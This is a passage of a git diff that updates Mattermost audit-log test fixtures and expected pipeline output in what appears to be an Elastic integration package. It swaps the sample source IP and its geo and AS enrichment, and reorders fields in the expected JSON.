+{"timestamp":"2021-12-05 01:13:08.904 Z","event":"addTeamMembers","status":"success","user_id":"ag99yu4i1if63jrui63tsmq57y","session_id":"f57d8pkf7iyg8xo6ttq73ggcnr","ip_address":"89.160.20.156","api_path":"/api/v4/teams/knrndtys13rzzk48ugm7mssnke/members/batch","count":1,"errors":"[cuk45yubk3nq8g7udrhojbk8ty:JoinUserToTeam: The user cannot be added as the domain associated with the account is not permitted. Contact your System Administrator for additional details., ]","team":{"id":"knrndtys13rzzk48ugm7mssnke","name":"test","type":"O"},"user_ids":"[cuk45yubk3nq8g7udrhojbk8ty]","cluster_id":"jq3utry71f8a7q9qgebmjccf4r","client":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36"} +{"timestamp":"2021-12-05 01:20:06.246 Z","event":"addTeamMembers","status":"success","user_id":"ag99yu4i1if63jrui63tsmq57y","session_id":"f57d8pkf7iyg8xo6ttq73ggcnr","ip_address":"89.160.20.156","api_path":"/api/v4/teams/knrndtys13rzzk48ugm7mssnke/members/batch","count":2,"errors":"[cuk45yubk3nq8g7udrhojbk8ty:JoinUserToTeam: The user cannot be added as the domain associated with the account is not permitted. Contact your System Administrator for additional details., z63ehbxy47fwpc8bmz9ouuh7fe:JoinUserToTeam: The user cannot be added as the domain associated with the account is not permitted. Contact your System Administrator for additional details., ]","team":{"id":"knrndtys13rzzk48ugm7mssnke","name":"test","type":"O"},"user_ids":"[cuk45yubk3nq8g7udrhojbk8ty z63ehbxy47fwpc8bmz9ouuh7fe]","cluster_id":"jq3utry71f8a7q9qgebmjccf4r","client":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36"} {"timestamp":"2021-12-05 17:21:36.724 Z","event":"deleteTeam","status":"success","user_id":"ag99yu4i1if63jrui63tsmq57y","session_id":"5timirrr5785mb3q1wutb5unrr","ip_address":"127.0.0.1","api_path":"/api/v4/teams/knrndtys13rzzk48ugm7mssnke","team":{"id":"knrndtys13rzzk48ugm7mssnke","name":"test","type":"O"},"cluster_id":"jq3utry71f8a7q9qgebmjccf4r","client":"mmctl/5.31.0 (linux)"} -{"timestamp":"2021-12-05 17:24:33.077 Z","event":"updateUserActive","status":"success","user_id":"ag99yu4i1if63jrui63tsmq57y","session_id":"jnqqnh3onjympe4u8pa5mgtexw","ip_address":"55.33.6.7","active":false,"api_path":"/api/v4/users/z63ehbxy47fwpc8bmz9ouuh7fe/active","user":{"id":"z63ehbxy47fwpc8bmz9ouuh7fe","name":"other2","roles":"system_user"},"cluster_id":"jq3utry71f8a7q9qgebmjccf4r","client":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36"} \ No newline at end of file +{"timestamp":"2021-12-05 17:24:33.077 Z","event":"updateUserActive","status":"success","user_id":"ag99yu4i1if63jrui63tsmq57y","session_id":"jnqqnh3onjympe4u8pa5mgtexw","ip_address":"89.160.20.156","active":false,"api_path":"/api/v4/users/z63ehbxy47fwpc8bmz9ouuh7fe/active","user":{"id":"z63ehbxy47fwpc8bmz9ouuh7fe","name":"other2","roles":"system_user"},"cluster_id":"jq3utry71f8a7q9qgebmjccf4r","client":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36"} \ No newline at end of file diff --git a/packages/mattermost/data_stream/audit/_dev/test/pipeline/test-audit.log-expected.json b/packages/mattermost/data_stream/audit/_dev/test/pipeline/test-audit.log-expected.json index 6c66544f3ac..e754c886be1 100644 --- a/packages/mattermost/data_stream/audit/_dev/test/pipeline/test-audit.log-expected.json +++ b/packages/mattermost/data_stream/audit/_dev/test/pipeline/test-audit.log-expected.json @@ -1,6 +1,18 @@ { "expected": [ { + "@timestamp": "2021-12-04T23:19:32.051Z", + "ecs": { + "version": "1.12" + }, + "related": { + "user": [ + "ag99yu4i1if63jrui63tsmq57y" + ], + "ip": [ + "89.160.20.156" + ] + }, "mattermost": { "audit": { "cluster": { @@ -14,45 +26,29 @@ }, "source": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-E", + "city_name": "Linköping", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Östergötland County", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 15.6167, + "lat": 58.4167 + } }, "as": { - "number": 721, + "number": 29518, "organization": { - "name": "DoD Network Information Center" + "name": "Bredband2 AB" } }, - "address": "55.33.6.7", - "ip": "55.33.6.7" - }, - "url": { - "path": "/api/v4/config", - "original": "/api/v4/config" - }, - "tags": [ - "preserve_original_event" - ], - "@timestamp": "2021-12-04T23:19:32.051Z", - "ecs": { - "version": "1.12" - }, - "related": { - "user": [ - "ag99yu4i1if63jrui63tsmq57y" - ], - "ip": [ - "55.33.6.7" - ] + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "event": { - "ingested": "2021-12-08T15:26:55.209438182Z", - "original": "{\"timestamp\":\"2021-12-04 23:19:32.051 Z\",\"event\":\"updateConfig\",\"status\":\"success\",\"user_id\":\"ag99yu4i1if63jrui63tsmq57y\",\"session_id\":\"pjh4n69j3p883k7hhzippskcba\",\"ip_address\":\"55.33.6.7\",\"api_path\":\"/api/v4/config\",\"cluster_id\":\"jq3utry71f8a7q9qgebmjccf4r\",\"client\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36\"}", + "ingested": "2021-12-15T08:59:12.543273278Z", + "original": "{\"timestamp\":\"2021-12-04 23:19:32.051 Z\",\"event\":\"updateConfig\",\"status\":\"success\",\"user_id\":\"ag99yu4i1if63jrui63tsmq57y\",\"session_id\":\"pjh4n69j3p883k7hhzippskcba\",\"ip_address\":\"89.160.20.156\",\"api_path\":\"/api/v4/config\",\"cluster_id\":\"jq3utry71f8a7q9qgebmjccf4r\",\"client\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36\"}", "kind": "event", "action": "updateConfig", "category": [ @@ -66,6 +62,10 @@ "user": { "id": "ag99yu4i1if63jrui63tsmq57y" }, + "url": { + "path": "/api/v4/config", + "original": "/api/v4/config" + }, "user_agent": { "name": "Chrome", "original": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36", @@ -78,9 +78,24 @@ "name": "Other" }, "version": "96.0.4664.45" - } + }, + "tags": [ + "preserve_original_event" + ] }, { + "@timestamp": "2021-12-04T23:19:48.599Z", + "ecs": { + "version": "1.12" + }, + "related": { + "user": [ + "ag99yu4i1if63jrui63tsmq57y" + ], + "ip": [ + "89.160.20.156" + ] + }, "mattermost": { "audit": { "cluster": { @@ -94,45 +109,29 @@ }, "source": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-E", + "city_name": "Linköping", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Östergötland County", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 15.6167, + "lat": 58.4167 + } }, "as": { - "number": 721, + "number": 29518, "organization": { - "name": "DoD Network Information Center" + "name": "Bredband2 AB" } }, - "address": "55.33.6.7", - "ip": "55.33.6.7" - }, - "url": { - "path": "/api/v4/config", - "original": "/api/v4/config" - }, - "tags": [ - "preserve_original_event" - ], - "@timestamp": "2021-12-04T23:19:48.599Z", - "ecs": { - "version": "1.12" - }, - "related": { - "user": [ - "ag99yu4i1if63jrui63tsmq57y" - ], - "ip": [ - "55.33.6.7" - ] + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "event": { - "ingested": "2021-12-08T15:26:55.209464858Z", - "original": "{\"timestamp\":\"2021-12-04 23:19:48.599 Z\",\"event\":\"updateConfig\",\"status\":\"success\",\"user_id\":\"ag99yu4i1if63jrui63tsmq57y\",\"session_id\":\"pjh4n69j3p883k7hhzippskcba\",\"ip_address\":\"55.33.6.7\",\"api_path\":\"/api/v4/config\",\"cluster_id\":\"jq3utry71f8a7q9qgebmjccf4r\",\"client\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36\"}", + "ingested": "2021-12-15T08:59:12.543277412Z", + "original": "{\"timestamp\":\"2021-12-04 23:19:48.599 Z\",\"event\":\"updateConfig\",\"status\":\"success\",\"user_id\":\"ag99yu4i1if63jrui63tsmq57y\",\"session_id\":\"pjh4n69j3p883k7hhzippskcba\",\"ip_address\":\"89.160.20.156\",\"api_path\":\"/api/v4/config\",\"cluster_id\":\"jq3utry71f8a7q9qgebmjccf4r\",\"client\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36\"}", "kind": "event", "action": "updateConfig", "category": [ @@ -146,6 +145,10 @@ "user": { "id": "ag99yu4i1if63jrui63tsmq57y" }, + "url": { + "path": "/api/v4/config", + "original": "/api/v4/config" + }, "user_agent": { "name": "Chrome", "original": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36", @@ -158,9 +161,24 @@ "name": "Other" }, "version": "96.0.4664.45" - } + }, + "tags": [ + "preserve_original_event" + ] }, { + "@timestamp": "2021-12-04T23:19:51.324Z", + "ecs": { + "version": "1.12" + }, + "related": { + "user": [ + "ag99yu4i1if63jrui63tsmq57y" + ], + "ip": [ + "89.160.20.156" + ] + }, "mattermost": { "audit": { "cluster": { @@ -174,45 +192,29 @@ }, "source": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-E", + "city_name": "Linköping", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Östergötland County", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 15.6167, + "lat": 58.4167 + } }, "as": { - "number": 721, + "number": 29518, "organization": { - "name": "DoD Network Information Center" + "name": "Bredband2 AB" } }, - "address": "55.33.6.7", - "ip": "55.33.6.7" - }, - "url": { - "path": "/api/v4/users/logout", - "original": "/api/v4/users/logout" - }, - "tags": [ - "preserve_original_event" - ], - "@timestamp": "2021-12-04T23:19:51.324Z", - "ecs": { - "version": "1.12" - }, - "related": { - "user": [ - "ag99yu4i1if63jrui63tsmq57y" - ], - "ip": [ - "55.33.6.7" - ] + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "event": { - "ingested": "2021-12-08T15:26:55.209471639Z", - "original": "{\"timestamp\":\"2021-12-04 23:19:51.324 Z\",\"event\":\"Logout\",\"status\":\"success\",\"user_id\":\"ag99yu4i1if63jrui63tsmq57y\",\"session_id\":\"pjh4n69j3p883k7hhzippskcba\",\"ip_address\":\"55.33.6.7\",\"api_path\":\"/api/v4/users/logout\",\"cluster_id\":\"jq3utry71f8a7q9qgebmjccf4r\",\"client\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36\"}", + "ingested": "2021-12-15T08:59:12.543278999Z", + "original": "{\"timestamp\":\"2021-12-04 23:19:51.324 Z\",\"event\":\"Logout\",\"status\":\"success\",\"user_id\":\"ag99yu4i1if63jrui63tsmq57y\",\"session_id\":\"pjh4n69j3p883k7hhzippskcba\",\"ip_address\":\"89.160.20.156\",\"api_path\":\"/api/v4/users/logout\",\"cluster_id\":\"jq3utry71f8a7q9qgebmjccf4r\",\"client\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36\"}", "kind": "event", "action": "Logout", "category": [ @@ -227,6 +229,10 @@ "user": { "id": "ag99yu4i1if63jrui63tsmq57y" }, + "url": { + "path": "/api/v4/users/logout", + "original": "/api/v4/users/logout" + }, "user_agent": { "name": "Chrome", "original": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36", @@ -239,9 +245,24 @@ "name": "Other" }, "version": "96.0.4664.45" - } + }, + "tags": [ + "preserve_original_event" + ] }, { + "@timestamp": "2021-12-04T23:19:58.729Z", + "ecs": { + "version": "1.12" + }, + "related": { + "user": [ + "ag99yu4i1if63jrui63tsmq57y" + ], + "ip": [ + "89.160.20.156" + ] + }, "mattermost": { "audit": { "cluster": { @@ -252,45 +273,29 @@ }, "source": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-E", + "city_name": "Linköping", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Östergötland County", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 15.6167, + "lat": 58.4167 + } }, "as": { - "number": 721, + "number": 29518, "organization": { - "name": "DoD Network Information Center" + "name": "Bredband2 AB" } }, - "address": "55.33.6.7", - "ip": "55.33.6.7" - }, - "url": { - "path": "/api/v4/users/login", - "original": "/api/v4/users/login" - }, - "tags": [ - "preserve_original_event" - ], - "@timestamp": "2021-12-04T23:19:58.729Z", - "ecs": { - "version": "1.12" - }, - "related": { - "user": [ - "ag99yu4i1if63jrui63tsmq57y" - ], - "ip": [ - "55.33.6.7" - ] + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "event": { - "ingested": "2021-12-08T15:26:55.209477057Z", - "original": "{\"timestamp\":\"2021-12-04 23:19:58.729 Z\",\"event\":\"login\",\"status\":\"success\",\"user_id\":\"\",\"session_id\":\"\",\"ip_address\":\"55.33.6.7\",\"api_path\":\"/api/v4/users/login\",\"device_id\":\"\",\"login_id\":\"admin\",\"user\":{\"id\":\"ag99yu4i1if63jrui63tsmq57y\",\"name\":\"admin\",\"roles\":\"system_admin system_user\"},\"cluster_id\":\"jq3utry71f8a7q9qgebmjccf4r\",\"client\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36\"}", + "ingested": "2021-12-15T08:59:12.543281762Z", + "original": "{\"timestamp\":\"2021-12-04 23:19:58.729 Z\",\"event\":\"login\",\"status\":\"success\",\"user_id\":\"\",\"session_id\":\"\",\"ip_address\":\"89.160.20.156\",\"api_path\":\"/api/v4/users/login\",\"device_id\":\"\",\"login_id\":\"admin\",\"user\":{\"id\":\"ag99yu4i1if63jrui63tsmq57y\",\"name\":\"admin\",\"roles\":\"system_admin system_user\"},\"cluster_id\":\"jq3utry71f8a7q9qgebmjccf4r\",\"client\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36\"}", "kind": "event", "action": "login", "category": [ @@ -312,6 +317,10 @@ "id": "ag99yu4i1if63jrui63tsmq57y" } }, + "url": { + "path": "/api/v4/users/login", + "original": "/api/v4/users/login" + }, "user_agent": { "name": "Chrome", "original": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36", @@ -324,9 +333,24 @@ "name": "Other" }, "version": "96.0.4664.45" - } + }, + "tags": [ + "preserve_original_event" + ] }, { + "@timestamp": "2021-12-04T23:20:33.027Z", + "ecs": { + "version": "1.12" + }, + "related": { + "user": [ + "ag99yu4i1if63jrui63tsmq57y" + ], + "ip": [ + "89.160.20.156" + ] + }, "mattermost": { "audit": { "patch": { @@ -345,45 +369,29 @@ }, "source": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-E", + "city_name": "Linköping", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Östergötland County", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 15.6167, + "lat": 58.4167 + } }, "as": { - "number": 721, + "number": 29518, "organization": { - "name": "DoD Network Information Center" + "name": "Bredband2 AB" } }, - "address": "55.33.6.7", - "ip": "55.33.6.7" - }, - "url": { - "path": "/api/v4/users/me/patch", - "original": "/api/v4/users/me/patch" - }, - "tags": [ - "preserve_original_event" - ], - "@timestamp": "2021-12-04T23:20:33.027Z", - "ecs": { - "version": "1.12" - }, - "related": { - "user": [ - "ag99yu4i1if63jrui63tsmq57y" - ], - "ip": [ - "55.33.6.7" - ] + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "event": { - "ingested": "2021-12-08T15:26:55.209482533Z", - "original": "{\"timestamp\":\"2021-12-04 23:20:33.027 Z\",\"event\":\"patchUser\",\"status\":\"success\",\"user_id\":\"ag99yu4i1if63jrui63tsmq57y\",\"session_id\":\"mbz8h4gkxp8g3yzanizcpg43dc\",\"ip_address\":\"55.33.6.7\",\"api_path\":\"/api/v4/users/me/patch\",\"patch\":{\"id\":\"ag99yu4i1if63jrui63tsmq57y\",\"name\":\"admin\",\"roles\":\"system_admin system_user\"},\"user\":{\"id\":\"ag99yu4i1if63jrui63tsmq57y\",\"name\":\"admin\",\"roles\":\"system_admin system_user\"},\"cluster_id\":\"jq3utry71f8a7q9qgebmjccf4r\",\"client\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36\"}", + "ingested": "2021-12-15T08:59:12.543283249Z", + "original": "{\"timestamp\":\"2021-12-04 23:20:33.027 Z\",\"event\":\"patchUser\",\"status\":\"success\",\"user_id\":\"ag99yu4i1if63jrui63tsmq57y\",\"session_id\":\"mbz8h4gkxp8g3yzanizcpg43dc\",\"ip_address\":\"89.160.20.156\",\"api_path\":\"/api/v4/users/me/patch\",\"patch\":{\"id\":\"ag99yu4i1if63jrui63tsmq57y\",\"name\":\"admin\",\"roles\":\"system_admin system_user\"},\"user\":{\"id\":\"ag99yu4i1if63jrui63tsmq57y\",\"name\":\"admin\",\"roles\":\"system_admin system_user\"},\"cluster_id\":\"jq3utry71f8a7q9qgebmjccf4r\",\"client\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36\"}", "kind": "event", "action": "patchUser", "category": [ @@ -406,6 +414,10 @@ "id": "ag99yu4i1if63jrui63tsmq57y" } }, + "url": { + "path": "/api/v4/users/me/patch", + "original": "/api/v4/users/me/patch" + }, "user_agent": { "name": "Chrome", "original": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36", @@ -418,9 +430,24 @@ "name": "Other" }, "version": "96.0.4664.45" - } + }, + "tags": [ + "preserve_original_event" + ] }, { + "@timestamp": "2021-12-04T23:20:37.771Z", + "ecs": { + "version": "1.12" + }, + "related": { + "user": [ + "ag99yu4i1if63jrui63tsmq57y" + ], + "ip": [ + "89.160.20.156" + ] + }, "mattermost": { "audit": { "patch": { @@ -439,45 +466,29 @@ }, "source": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-E", + "city_name": "Linköping", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Östergötland County", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 15.6167, + "lat": 58.4167 + } }, "as": { - "number": 721, + "number": 29518, "organization": { - "name": "DoD Network Information Center" + "name": "Bredband2 AB" } }, - "address": "55.33.6.7", - "ip": "55.33.6.7" - }, - "url": { - "path": "/api/v4/users/me/patch", - "original": "/api/v4/users/me/patch" - }, - "tags": [ - "preserve_original_event" - ], - "@timestamp": "2021-12-04T23:20:37.771Z", - "ecs": { - "version": "1.12" - }, - "related": { - "user": [ - "ag99yu4i1if63jrui63tsmq57y" - ], - "ip": [ - "55.33.6.7" - ] + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "event": { - "ingested": "2021-12-08T15:26:55.209487988Z", - "original": "{\"timestamp\":\"2021-12-04 23:20:37.771 Z\",\"event\":\"patchUser\",\"status\":\"success\",\"user_id\":\"ag99yu4i1if63jrui63tsmq57y\",\"session_id\":\"mbz8h4gkxp8g3yzanizcpg43dc\",\"ip_address\":\"55.33.6.7\",\"api_path\":\"/api/v4/users/me/patch\",\"patch\":{\"id\":\"ag99yu4i1if63jrui63tsmq57y\",\"name\":\"admin\",\"roles\":\"system_admin system_user\"},\"user\":{\"id\":\"ag99yu4i1if63jrui63tsmq57y\",\"name\":\"admin\",\"roles\":\"system_admin system_user\"},\"cluster_id\":\"jq3utry71f8a7q9qgebmjccf4r\",\"client\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36\"}", + "ingested": "2021-12-15T08:59:12.543284621Z", + "original": "{\"timestamp\":\"2021-12-04 23:20:37.771 Z\",\"event\":\"patchUser\",\"status\":\"success\",\"user_id\":\"ag99yu4i1if63jrui63tsmq57y\",\"session_id\":\"mbz8h4gkxp8g3yzanizcpg43dc\",\"ip_address\":\"89.160.20.156\",\"api_path\":\"/api/v4/users/me/patch\",\"patch\":{\"id\":\"ag99yu4i1if63jrui63tsmq57y\",\"name\":\"admin\",\"roles\":\"system_admin system_user\"},\"user\":{\"id\":\"ag99yu4i1if63jrui63tsmq57y\",\"name\":\"admin\",\"roles\":\"system_admin system_user\"},\"cluster_id\":\"jq3utry71f8a7q9qgebmjccf4r\",\"client\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36\"}", "kind": "event", "action": "patchUser", "category": [ @@ -500,6 +511,10 @@ "id": "ag99yu4i1if63jrui63tsmq57y" } }, + "url": { + "path": "/api/v4/users/me/patch", + "original": "/api/v4/users/me/patch" + }, "user_agent": { "name": "Chrome", "original": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36", @@ -512,9 +527,24 @@ "name": "Other" }, "version": "96.0.4664.45" - } + }, + "tags": [ + "preserve_original_event" + ] }, { + "@timestamp": "2021-12-04T23:20:53.063Z", + "ecs": { + "version": "1.12" + }, + "related": { + "user": [ + "ag99yu4i1if63jrui63tsmq57y" + ], + "ip": [ + "89.160.20.156" + ] + }, "mattermost": { "audit": { "cluster": { @@ -528,45 +558,29 @@ }, "source": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-E", + "city_name": "Linköping", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Östergötland County", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 15.6167, + "lat": 58.4167 + } }, "as": { - "number": 721, + "number": 29518, "organization": { - "name": "DoD Network Information Center" + "name": "Bredband2 AB" } }, - "address": "55.33.6.7", - "ip": "55.33.6.7" - }, - "url": { - "path": "/api/v4/users/ag99yu4i1if63jrui63tsmq57y/password", - "original": "/api/v4/users/ag99yu4i1if63jrui63tsmq57y/password" - }, - "tags": [ - "preserve_original_event" - ], - "@timestamp": "2021-12-04T23:20:53.063Z", - "ecs": { - "version": "1.12" - }, - "related": { - "user": [ - "ag99yu4i1if63jrui63tsmq57y" - ], - "ip": [ - "55.33.6.7" - ] + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "event": { - "ingested": "2021-12-08T15:26:55.209493245Z", - "original": "{\"timestamp\":\"2021-12-04 23:20:53.063 Z\",\"event\":\"updatePassword\",\"status\":\"success\",\"user_id\":\"ag99yu4i1if63jrui63tsmq57y\",\"session_id\":\"mbz8h4gkxp8g3yzanizcpg43dc\",\"ip_address\":\"55.33.6.7\",\"api_path\":\"/api/v4/users/ag99yu4i1if63jrui63tsmq57y/password\",\"user\":{\"id\":\"ag99yu4i1if63jrui63tsmq57y\",\"name\":\"admin\",\"roles\":\"system_admin system_user\"},\"cluster_id\":\"jq3utry71f8a7q9qgebmjccf4r\",\"client\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36\"}", + "ingested": "2021-12-15T08:59:12.543285998Z", + "original": "{\"timestamp\":\"2021-12-04 23:20:53.063 Z\",\"event\":\"updatePassword\",\"status\":\"success\",\"user_id\":\"ag99yu4i1if63jrui63tsmq57y\",\"session_id\":\"mbz8h4gkxp8g3yzanizcpg43dc\",\"ip_address\":\"89.160.20.156\",\"api_path\":\"/api/v4/users/ag99yu4i1if63jrui63tsmq57y/password\",\"user\":{\"id\":\"ag99yu4i1if63jrui63tsmq57y\",\"name\":\"admin\",\"roles\":\"system_admin system_user\"},\"cluster_id\":\"jq3utry71f8a7q9qgebmjccf4r\",\"client\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36\"}", "kind": "event", "action": "updatePassword", "category": [ @@ -589,6 +603,10 @@ "id": "ag99yu4i1if63jrui63tsmq57y" } }, + "url": { + "path": "/api/v4/users/ag99yu4i1if63jrui63tsmq57y/password", + "original": "/api/v4/users/ag99yu4i1if63jrui63tsmq57y/password" + }, "user_agent": { "name": "Chrome", "original": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36", @@ -601,9 +619,24 @@ "name": "Other" }, "version": "96.0.4664.45" - } + }, + "tags": [ + "preserve_original_event" + ] }, { + "@timestamp": "2021-12-04T23:28:18.032Z", + "ecs": { + "version": "1.12" + }, + "related": { + "user": [ + "ag99yu4i1if63jrui63tsmq57y" + ], + "ip": [ + "89.160.20.156" + ] + }, "mattermost": { "audit": { "cluster": { @@ -617,45 +650,29 @@ }, "source": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-E", + "city_name": "Linköping", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Östergötland County", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "as": { - "number": 721, - "organization": { - "name": "DoD Network Information Center" - } - }, - "address": "55.33.6.7", - "ip": "55.33.6.7" - }, - "url": { - "path": "/api/v4/users/ag99yu4i1if63jrui63tsmq57y/preferences", - "original": "/api/v4/users/ag99yu4i1if63jrui63tsmq57y/preferences" - }, - "tags": [ - "preserve_original_event" - ], - "@timestamp": "2021-12-04T23:28:18.032Z", - "ecs": { - "version": "1.12" - }, - "related": { - "user": [ - "ag99yu4i1if63jrui63tsmq57y" - ], - "ip": [ - "55.33.6.7" - ] + "lon": 15.6167, + "lat": 58.4167 + } + }, + "as": { + "number": 29518, + "organization": { + "name": "Bredband2 AB" + } + }, + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "event": { - "ingested": "2021-12-08T15:26:55.209498456Z", - "original": "{\"timestamp\":\"2021-12-04 23:28:18.032 Z\",\"event\":\"updatePreferences\",\"status\":\"success\",\"user_id\":\"ag99yu4i1if63jrui63tsmq57y\",\"session_id\":\"mbz8h4gkxp8g3yzanizcpg43dc\",\"ip_address\":\"55.33.6.7\",\"api_path\":\"/api/v4/users/ag99yu4i1if63jrui63tsmq57y/preferences\",\"cluster_id\":\"jq3utry71f8a7q9qgebmjccf4r\",\"client\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36\"}", + "ingested": "2021-12-15T08:59:12.543287384Z", + "original": "{\"timestamp\":\"2021-12-04 23:28:18.032 Z\",\"event\":\"updatePreferences\",\"status\":\"success\",\"user_id\":\"ag99yu4i1if63jrui63tsmq57y\",\"session_id\":\"mbz8h4gkxp8g3yzanizcpg43dc\",\"ip_address\":\"89.160.20.156\",\"api_path\":\"/api/v4/users/ag99yu4i1if63jrui63tsmq57y/preferences\",\"cluster_id\":\"jq3utry71f8a7q9qgebmjccf4r\",\"client\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36\"}", "kind": "event", "action": "updatePreferences", "category": [ @@ -670,6 +687,10 @@ "user": { "id": "ag99yu4i1if63jrui63tsmq57y" }, + "url": { + "path": "/api/v4/users/ag99yu4i1if63jrui63tsmq57y/preferences", + "original": "/api/v4/users/ag99yu4i1if63jrui63tsmq57y/preferences" + }, "user_agent": { "name": "Chrome", "original": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36", @@ -682,9 +703,24 @@ "name": "Other" }, "version": "96.0.4664.45" - } + }, + "tags": [ + "preserve_original_event" + ] }, { + "@timestamp": "2021-12-04T23:28:19.342Z", + "ecs": { + "version": "1.12" + }, + "related": { + "user": [ + "ag99yu4i1if63jrui63tsmq57y" + ], + "ip": [ + "89.160.20.156" + ] + }, "mattermost": { "audit": { "cluster": { @@ -710,45 +746,29 @@ }, "source": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-E", + "city_name": "Linköping", + "country_iso_code": "SE", + "country_name": 